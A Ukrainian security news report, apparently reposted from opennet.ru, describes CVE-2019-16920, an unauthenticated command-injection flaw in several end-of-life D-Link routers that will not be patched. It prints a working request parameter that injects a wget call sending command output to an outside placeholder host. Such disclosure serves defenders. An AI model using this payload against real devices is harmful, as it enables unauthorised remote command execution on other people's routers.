Уразливість у маршрутизаторах D-Link, що віддалено експлуатується.

У бездротових маршрутизаторах D-Link виявлено небезпечна вразливість (CVE-2019-16920), що дозволяє віддалено виконати код на стороні пристрою через відправлення спеціального запиту до оброблювача «ping_test», доступного без проходження аутентифікації.

Цікаво, що за задумом розробників прошивки виклик "ping_test" повинен виконуватися тільки після аутентифікації, але насправді він викликається у будь-якому випадку, незалежно від входу до web-інтерфейсу. Зокрема, при зверненні до скрипту apply_sec.cgi з передачею параметра action = ping_test, скрипт перекидає на сторінку аутентифікації, але при цьому виконує пов'язану з ping_test дію. Для виконання коду використано ще одну вразливість у самому ping_test, який викликає утиліту ping без належної перевірки коректності переданої для тестування IP-адреси. Наприклад, для виклику утиліти wget та передачі на зовнішній хост результатів виконання команди «echo 1234» достатньо вказати параметр «ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)».

Уразливість у маршрутизаторах D-Link, що віддалено експлуатується.

Наявність уразливості офіційно підтверджено у моделях:

  • DIR-655 з прошивкою 3.02b05 або старше;
  • DIR-866L з прошивкою 1.03b04 або старше;
  • DIR-1565 з прошивкою 1.01 або старше;
  • DIR-652 (даних про версії проблемних прошивок не наводиться)

Час супроводу даних моделей вже минув, тому компанія D-Link заявила, що не випускатиме для них оновлення з усуненням уразливості, не рекомендує використовувати та радить замінити на нові пристрої. Як обхідний шлях захисту можна обмежити доступ до web-інтерфейсу тільки для IP-адрес, що заслуговують на довіру.

Пізніше з'ясувалося, що вразливість також торкається моделі DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 та DIR-825, про плани з випуску оновлень для яких поки що нічого не відомо.

Джерело: opennet.ru

Додати коментар або відгук